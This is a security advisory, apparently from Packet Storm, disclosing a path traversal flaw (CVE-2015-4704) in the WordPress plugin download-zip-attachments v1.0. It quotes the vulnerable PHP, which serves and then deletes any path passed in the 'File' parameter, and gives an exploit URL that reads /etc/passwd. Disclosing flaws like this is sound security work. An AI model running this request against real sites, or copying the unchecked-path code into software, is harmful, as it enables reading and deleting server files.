Download Zip Attachments 1.0 File Download

2015-06-26T00:00:00
ID PACKETSTORM:132459
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-06-26T00:00:00

Description

                                        
                                            `Title: Remote file download vulnerability in download-zip-attachments v1.0  
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-10  
Download Site: https://wordpress.org/plugins/download-zip-attachments/  
Vendor: rivenvirus  
Vendor Notified: 2015-06-15  
Vendor Contact: https://profiles.wordpress.org/rivenvirus/  
Advisory: http://www.vapid.dhs.org/advisory.php?v=129  
Description:   
Download all attachments from the post into a zip file.  
  
Vulnerability:  
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.  
  
<?php  
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){  
define('WP_USE_THEMES', false);  
require('../../../wp-load.php');   
require "create_zip_file.php";  
$uploads = wp_upload_dir();   
$tmp_location = $uploads['path']."/".$_REQUEST['File'];  
//echo $tmp_location;  
$zip = new CreateZipFile;  
$zip->forceDownload($tmp_location,false);   
unlink($tmp_location);   
exit;  
}  
  
CVEID: 2015-4704  
OSVDB:  
Exploit Code:  
• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd  
  
  
`